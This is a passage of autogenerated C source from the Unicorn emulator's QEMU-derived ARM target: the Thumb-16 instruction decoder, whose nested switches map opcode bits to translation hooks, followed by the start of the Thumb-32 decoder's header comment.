extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; a->shimm = 0; a->shtype = 0; } static void disas_t16_extract_ldst_spec_i(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->rt = extract32(insn, 8, 3); a->p = 1; a->w = 0; a->u = 1; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t16_extract_ldstm(DisasContext *ctx, arg_ldst_block *a, uint16_t insn) { a->rn = extract32(insn, 8, 3); a->list = extract32(insn, 0, 8); a->i = 1; a->b = 0; a->u = 0; a->w = 1; } static void disas_t16_extract_lll_noshr(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rn = extract32(insn, 0, 3); a->shim = 0; a->shty = 0; } static void disas_t16_extract_lxl_shr(DisasContext *ctx, arg_s_rrr_shr *a, uint16_t insn) { a->rs = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rm = extract32(insn, 0, 3); a->rn = 0; } static void disas_t16_extract_rdm(DisasContext *ctx, arg_rr *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); } static void disas_t16_extract_shift_i(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->shim = extract32(insn, 6, 5); a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rn = extract32(insn, 0, 3); } static void disas_t16_extract_xll_noshr(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rn = extract32(insn, 0, 3); a->s = 1; a->rd = 0; a->shim = 0; a->shty = 0; } static bool disas_t16(DisasContext *ctx, uint16_t insn) { union { arg_ci f_ci; arg_cps f_cps; arg_disas_t1616 f_disas_t1616; arg_disas_t1617 f_disas_t1617; arg_disas_t1618 f_disas_t1618; arg_empty f_empty; arg_i f_i; arg_ldst_block f_ldst_block; arg_ldst_ri f_ldst_ri; arg_ldst_rr f_ldst_rr; arg_r f_r; arg_ri f_ri; arg_rr f_rr; arg_rrr_rot f_rrr_rot; arg_s_rri_rot f_s_rri_rot; arg_s_rrr_shi f_s_rrr_shi; arg_s_rrr_shr f_s_rrr_shr; arg_s_rrrr f_s_rrrr; arg_setend f_setend; } u; switch ((insn >> 12) & 0xf) { case 0x0: /* 0000.... ........ */ disas_t16_extract_shift_i(ctx, &u.f_s_rrr_shi, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 00000... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:137 */ u.f_s_rrr_shi.shty = 0; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 00001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:138 */ u.f_s_rrr_shi.shty = 1; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x1: /* 0001.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 00010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:139 */ disas_t16_extract_shift_i(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.shty = 2; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 00011... ........ */ switch ((insn >> 9) & 0x3) { case 0x0: /* 0001100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:146 */ disas_t16_extract_addsub_3(ctx, &u.f_s_rrr_shi, insn); if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 0001101. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:147 */ disas_t16_extract_addsub_3(ctx, &u.f_s_rrr_shi, insn); if (trans_SUB_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* 0001110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:154 */ disas_t16_extract_addsub_2i(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x3: /* 0001111. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:155 */ disas_t16_extract_addsub_2i(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; } return false; case 0x2: /* 0010.... ........ */ disas_t16_extract_arith_1i(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 00100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:163 */ u.f_s_rri_rot.s = t16_setflags(ctx); if (trans_MOV_rxi(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 00101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:164 */ u.f_s_rri_rot.s = 1; if (trans_CMP_xri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x3: /* 0011.... ........ */ disas_t16_extract_arith_1i(ctx, &u.f_s_rri_rot, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 00110... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:165 */ u.f_s_rri_rot.s = t16_setflags(ctx); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x1: /* 00111... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:166 */ u.f_s_rri_rot.s = t16_setflags(ctx); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0x4: /* 0100.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 01000... ........ */ switch ((insn >> 8) & 0x7) { case 0x0: /* 01000000 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:53 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_AND_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 01000000 01...... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:54 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_EOR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* 01000000 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:55 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 0; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x3: /* 01000000 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:56 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 1; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x1: /* 01000001 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000001 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:57 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 2; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; case 0x1: /* 01000001 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:58 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_ADC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x2: /* 01000001 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:59 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_SBC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* 01000001 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:60 */ disas_t16_extract_lxl_shr(ctx, &u.f_s_rrr_shr, insn); u.f_s_rrr_shr.shty = 3; if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x2: /* 01000010 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000010 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:61 */ disas_t16_extract_xll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_TST_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 01000010 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:62 */ disas_t16_extract_disas_t16_Fmt_3(ctx, &u.f_s_rri_rot, insn); if (trans_RSB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x2: /* 01000010 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:63 */ disas_t16_extract_xll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* 01000010 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:64 */ disas_t16_extract_xll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_CMN_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x3: /* 01000011 ........ */ switch ((insn >> 6) & 0x3) { case 0x0: /* 01000011 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:65 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_ORR_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x1: /* 01000011 01...... 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:66 */ disas_t16_extract_disas_t16_Fmt_4(ctx, &u.f_s_rrrr, insn); if (trans_MUL(ctx, &u.f_s_rrrr)) return true; return false; case 0x2: /* 01000011 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:67 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_BIC_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x3: /* 01000011 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:68 */ disas_t16_extract_lll_noshr(ctx, &u.f_s_rrr_shi, insn); if (trans_MVN_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; } return false; case 0x4: /* 01000100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:174 */ disas_t16_extract_addsub_2h(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.s = 0; if (trans_ADD_rrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x5: /* 01000101 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:175 */ disas_t16_extract_addsub_2h(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.s = 1; if (trans_CMP_xrri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x6: /* 01000110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:176 */ disas_t16_extract_addsub_2h(ctx, &u.f_s_rrr_shi, insn); u.f_s_rrr_shi.s = 0; if (trans_MOV_rxri(ctx, &u.f_s_rrr_shi)) return true; return false; case 0x7: /* 01000111 ........ */ disas_t16_extract_branchr(ctx, &u.f_r, insn); switch (insn & 0x00000087) { case 0x00000000: /* 01000111 0....000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:191 */ if (trans_BX(ctx, &u.f_r)) return true; return false; case 0x00000004: /* 01000111 0....100 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:193 */ if (trans_BXNS(ctx, &u.f_r)) return true; return false; case 0x00000080: /* 01000111 1....000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:192 */ if (trans_BLX_r(ctx, &u.f_r)) return true; return false; case 0x00000084: /* 01000111 1....100 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:194 */ if (trans_BLXNS(ctx, &u.f_r)) return true; return false; } return false; } return false; case 0x1: /* 01001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:118 */ disas_t16_extract_ldst_spec_i(ctx, &u.f_ldst_ri, insn); u.f_ldst_ri.rn = 15; if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x5: /* 0101.... ........ */ disas_t16_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch ((insn >> 9) & 0x7) { case 0x0: /* 0101000. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:75 */ if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x1: /* 0101001. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:76 */ if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x2: /* 0101010. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:77 */ if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x3: /* 0101011. ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:78 */ if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x4: /* 0101100. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:79 */ if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x5: /* 0101101. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:80 */ if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x6: /* 0101110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:81 */ if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; return false; case 0x7: /* 0101111. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:82 */ if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x6: /* 0110.... ........ */ disas_t16_extract_ldst_ri_4(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 01100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:93 */ if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 01101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:94 */ if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x7: /* 0111.... ........ */ disas_t16_extract_ldst_ri_1(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 01110... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:95 */ if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 01111... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:96 */ if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x8: /* 1000.... ........ */ disas_t16_extract_ldst_ri_2(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 10000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:104 */ if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 10001... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:105 */ if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x9: /* 1001.... ........ */ disas_t16_extract_ldst_spec_i(ctx, &u.f_ldst_ri, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 10010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:113 */ u.f_ldst_ri.rn = 13; if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x1: /* 10011... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:114 */ u.f_ldst_ri.rn = 13; if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0xa: /* 1010.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 10100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:122 */ disas_t16_extract_disas_t16_Fmt_10(ctx, &u.f_ri, insn); if (trans_ADR(ctx, &u.f_ri)) return true; return false; case 0x1: /* 10101... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:123 */ disas_t16_extract_disas_t16_Fmt_11(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; } return false; case 0xb: /* 1011.... ........ */ switch ((insn >> 10) & 0x1) { case 0x0: /* 1011.0.. ........ */ switch ((insn >> 8) & 0x1) { case 0x0: /* 1011.0.0 ........ */ switch (insn & 0x00000a80) { case 0x00000000: /* 10110000 0....... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:184 */ disas_t16_extract_addsub_sp_i(ctx, &u.f_s_rri_rot, insn); if (trans_ADD_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x00000080: /* 10110000 1....... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:185 */ disas_t16_extract_addsub_sp_i(ctx, &u.f_s_rri_rot, insn); if (trans_SUB_rri(ctx, &u.f_s_rri_rot)) return true; return false; case 0x00000200: /* 10110010 0....... */ disas_t16_extract_extend(ctx, &u.f_rrr_rot, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* 10110010 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:200 */ if (trans_SXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x1: /* 10110010 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:201 */ if (trans_SXTAB(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x00000280: /* 10110010 1....... */ disas_t16_extract_extend(ctx, &u.f_rrr_rot, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* 10110010 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:202 */ if (trans_UXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x1: /* 10110010 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:203 */ if (trans_UXTAB(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x00000a00: /* 10111010 0....... */ disas_t16_extract_rdm(ctx, &u.f_rr, insn); switch ((insn >> 6) & 0x1) { case 0x0: /* 10111010 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:219 */ if (trans_REV(ctx, &u.f_rr)) return true; return false; case 0x1: /* 10111010 01...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:220 */ if (trans_REV16(ctx, &u.f_rr)) return true; return false; } return false; case 0x00000a80: /* 10111010 1....... */ switch ((insn >> 6) & 0x1) { case 0x0: /* 10111010 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:246 */ disas_t16_extract_disas_t16_Fmt_27(ctx, &u.f_i, insn); if (trans_HLT(ctx, &u.f_i)) return true; return false; case 0x1: /* 10111010 11...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:221 */ disas_t16_extract_rdm(ctx, &u.f_rr, insn); if (trans_REVSH(ctx, &u.f_rr)) return true; return false; } return false; } return false; case 0x1: /* 1011.0.1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:248 */ disas_t16_extract_disas_t16_Fmt_29(ctx, &u.f_disas_t1618, insn); if (trans_CBZ(ctx, &u.f_disas_t1618)) return true; return false; } return false; case 0x1: /* 1011.1.. ........ */ switch (insn & 0x00000a00) { case 0x00000000: /* 1011010. ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:255 */ disas_t16_extract_disas_t16_Fmt_30(ctx, &u.f_ldst_block, insn); if (trans_STM(ctx, &u.f_ldst_block)) return true; return false; case 0x00000200: /* 1011011. ........ */ switch ((insn >> 5) & 0xf) { case 0x2: /* 10110110 010..... */ disas_t16_extract_disas_t16_Fmt_21(ctx, &u.f_setend, insn); switch (insn & 0x00000017) { case 0x00000010: /* 10110110 0101.000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:209 */ if (trans_SETEND(ctx, &u.f_setend)) return true; return false; } return false; case 0x3: /* 10110110 011..... */ switch ((insn >> 3) & 0x1) { case 0x0: /* 10110110 011.0... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:211 */ disas_t16_extract_disas_t16_Fmt_22(ctx, &u.f_cps, insn); if (trans_CPS(ctx, &u.f_cps)) return true; if ((insn & 0x00000004) == 0x00000000) { /* 10110110 011.00.. */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:212 */ disas_t16_extract_disas_t16_Fmt_23(ctx, &u.f_disas_t1616, insn); if (trans_CPS_v7m(ctx, &u.f_disas_t1616)) return true; } return false; } return false; } return false; case 0x00000800: /* 1011110. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:257 */ disas_t16_extract_disas_t16_Fmt_31(ctx, &u.f_ldst_block, insn); if (trans_LDM_t16(ctx, &u.f_ldst_block)) return true; return false; case 0x00000a00: /* 1011111. ........ */ switch ((insn >> 8) & 0x1) { case 0x0: /* 10111110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:247 */ disas_t16_extract_disas_t16_Fmt_28(ctx, &u.f_i, insn); if (trans_BKPT(ctx, &u.f_i)) return true; return false; case 0x1: /* 10111111 ........ */ if ((insn & 0x0000000f) == 0x00000000) { /* 10111111 ....0000 */ if ((insn & 0x000000f0) == 0x00000010) { /* 10111111 00010000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:227 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_YIELD(ctx, &u.f_empty)) return true; } if ((insn & 0x000000f0) == 0x00000020) { /* 10111111 00100000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:228 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_WFE(ctx, &u.f_empty)) return true; } if ((insn & 0x000000f0) == 0x00000030) { /* 10111111 00110000 */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:229 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_WFI(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:237 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:239 */ disas_t16_extract_disas_t16_Fmt_26(ctx, &u.f_disas_t1617, insn); if (trans_IT(ctx, &u.f_disas_t1617)) return true; return false; } return false; } return false; } return false; case 0xc: /* 1100.... ........ */ disas_t16_extract_ldstm(ctx, &u.f_ldst_block, insn); switch ((insn >> 11) & 0x1) { case 0x0: /* 11000... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:130 */ if (trans_STM(ctx, &u.f_ldst_block)) return true; return false; case 0x1: /* 11001... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:131 */ if (trans_LDM_t16(ctx, &u.f_ldst_block)) return true; return false; } return false; case 0xd: /* 1101.... ........ */ if ((insn & 0x00000f00) == 0x00000e00) { /* 11011110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:265 */ disas_t16_extract_disas_t16_Fmt_25(ctx, &u.f_empty, insn); if (trans_UDF(ctx, &u.f_empty)) return true; } if ((insn & 0x00000f00) == 0x00000f00) { /* 11011111 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:266 */ disas_t16_extract_disas_t16_Fmt_28(ctx, &u.f_i, insn); if (trans_SVC(ctx, &u.f_i)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:267 */ disas_t16_extract_disas_t16_Fmt_32(ctx, &u.f_ci, insn); if (trans_B_cond_thumb(ctx, &u.f_ci)) return true; return false; case 0xe: /* 1110.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 11100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:274 */ disas_t16_extract_disas_t16_Fmt_33(ctx, &u.f_i, insn); if (trans_B(ctx, &u.f_i)) return true; return false; case 0x1: /* 11101... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:279 */ disas_t16_extract_disas_t16_Fmt_34(ctx, &u.f_i, insn); if (trans_BLX_suffix(ctx, &u.f_i)) return true; return false; } return false; case 0xf: /* 1111.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 11110... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:280 */ disas_t16_extract_disas_t16_Fmt_35(ctx, &u.f_i, insn); if (trans_BL_BLX_prefix(ctx, &u.f_i)) return true; return false; case 0x1: /* 11111... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t16.decode:281 */ disas_t16_extract_disas_t16_Fmt_34(ctx, &u.f_i, insn); if (trans_BL_suffix(ctx, &u.f_i)) return true; return false; } return false; } return false; }
unicorn-2.1.1/qemu/target/arm/decode-t32.inc.c
/* This file is autogenerated by scripts/decodetree.py.
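 *
 * decode-t32.inc.c follows the same three-layer pattern as the generated
 * disas_t16() above: nested switches match the fixed opcode bits of a
 * 32-bit Thumb instruction, a disas_t32_extract_*() helper then unpacks
 * the variable bit fields into a shared argument struct, and that struct
 * is handed to a hand-written trans_*() hook (implemented elsewhere in
 * the target, in translate.c) which returns true once the instruction
 * has been translated. Each case arm below corresponds to one pattern
 * line of target/arm/t32.decode; as a rough, illustrative sketch of the
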